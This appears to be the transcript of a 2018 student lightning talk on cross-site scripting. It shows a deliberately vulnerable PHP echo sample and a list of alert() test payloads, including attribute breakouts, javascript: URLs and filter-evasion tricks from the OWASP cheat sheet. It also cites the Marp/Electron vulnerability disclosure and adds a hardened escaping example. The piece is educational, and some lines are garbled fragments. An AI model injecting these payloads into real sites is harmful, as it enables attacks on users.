Investigating XSS input values / searching xss insertion value
Tomoyuki KOYAMA
February 03, 2018
2018/02/03 Student LT at freee
Transcript
XSS
B1 (first-year undergraduate). Twitter: @tmyk_kym. Blog: https://blog.koyama.me/. Interests: Network / Web / Server / Security. PyCon JP, Seccamp, etc.
XSS (Cross Site Scripting): HTML injection. CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (3.0)
Sample (PHP): <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode']; ?></h1>
$_GET['mode'] = hello  ->  <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1>hello</h1>
$_GET['mode'] = <script>alert()</script>  ->  <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><script>alert()</script></h1>
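The slide's sample echoes $_GET['mode'] straight into the page. The following is an added example, not code from the deck, that places that vulnerable rendering next to a hardened version which escapes the value with htmlspecialchars before it reaches HTML element content or a quoted attribute. The function names h, renderVulnerable, renderSafe and renderAttrSafe are this example's own, and the three inputs are constructed from payloads the deck shows.

```php
<?php
// Added example (not from the original deck). Assumes PHP 5.4 or later
// for ENT_HTML5 and ENT_SUBSTITUTE.
declare(strict_types=1);

// Escape untrusted text for HTML element content or a double-quoted
// attribute value. ENT_QUOTES also converts single quotes; ENT_SUBSTITUTE
// replaces invalid UTF-8 instead of returning an empty string.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

// Vulnerable rendering, as on the slide: the parameter is echoed verbatim.
function renderVulnerable(string $mode): string
{
    return '<h1>' . $mode . '</h1>';
}

// Hardened rendering: the same parameter, escaped before it reaches the HTML.
function renderSafe(string $mode): string
{
    return '<h1>' . h($mode) . '</h1>';
}

// Attribute context: the value is placed inside a double-quoted attribute,
// so the escaped double quote keeps the payload from closing the attribute.
function renderAttrSafe(string $mode): string
{
    return '<input type="text" name="mode" value="' . h($mode) . '">';
}

// Constructed sample inputs: the two from the slide plus the
// attribute-breaking payload listed later in the deck.
$samples = [
    'hello',
    '<script>alert()</script>',
    '" onmouseover="alert(1)',
];

foreach ($samples as $mode) {
    echo 'input:      ' . $mode . PHP_EOL;
    echo 'vulnerable: ' . renderVulnerable($mode) . PHP_EOL;
    echo 'hardened:   ' . renderSafe($mode) . PHP_EOL;
    echo 'attribute:  ' . renderAttrSafe($mode) . PHP_EOL;
    echo PHP_EOL;
}
```

Escaping is context-specific: h() covers element content and quoted attribute values, but a value placed in a URL attribute such as href or src (the javascript: payloads the deck lists) additionally needs the scheme restricted to an allowlist, and a value placed inside a script block needs JavaScript-specific encoding.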
Types of XSS: Stored XSS, Reflected XSS, DOM Based XSS
XSS == XSS
Typical input values:
<script>alert(1)</script>
"><script>alert(1)</script>
" onmouseover="alert(1)
x" onerror="alert(1)   <- img src
javascript:alert(1)   <- a href
XSS
? / . XSS . XSS .
?
OWASP XSS Filter Evasion Cheat Sheet (2015) - OWASP: https://jpcertcc.github.io/OWASPdocuments/CheatSheets/XSSFilterEvasion.html
Three examples:
[1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> is parsed by the browser as <script xss="" src="http://example.com/xss.js"></script>
[2] <<SCRIPT>alert("XSS");//<</SCRIPT> is rendered as "><script> alert("XSS");//< </script>
[3] <img src=x onerror=javas cript:ale rt('XSS')> with HTML hexadecimal character references (&#x...) inside the attribute value is decoded by the browser to <img src="x" onerror="javascript:alert('XSS')">
( )
Other examples from the cheat sheet:
<img src=javascript:alert('XSS')>
<img src=javascript: alert(String.fromCharCode(88,83,83))>
<META HTTP-EQUIV="refresh" CONTENT="3; URL=http://;URL=http://yahoo.co.jp/;">
Electron / Marp: Marp is an Electron (Web technology) application ... <script>alert()</script> ... alert ... ( )
?
JVN#21174546: Marp JavaScript injection, https://jvn.jp/jp/JVN21174546/
"However, sanitizing inline script should consider on future." ([Security issue] Remote script can read user local resource · Issue #187 · yhatt/marp)
XSS XSS alert() Electron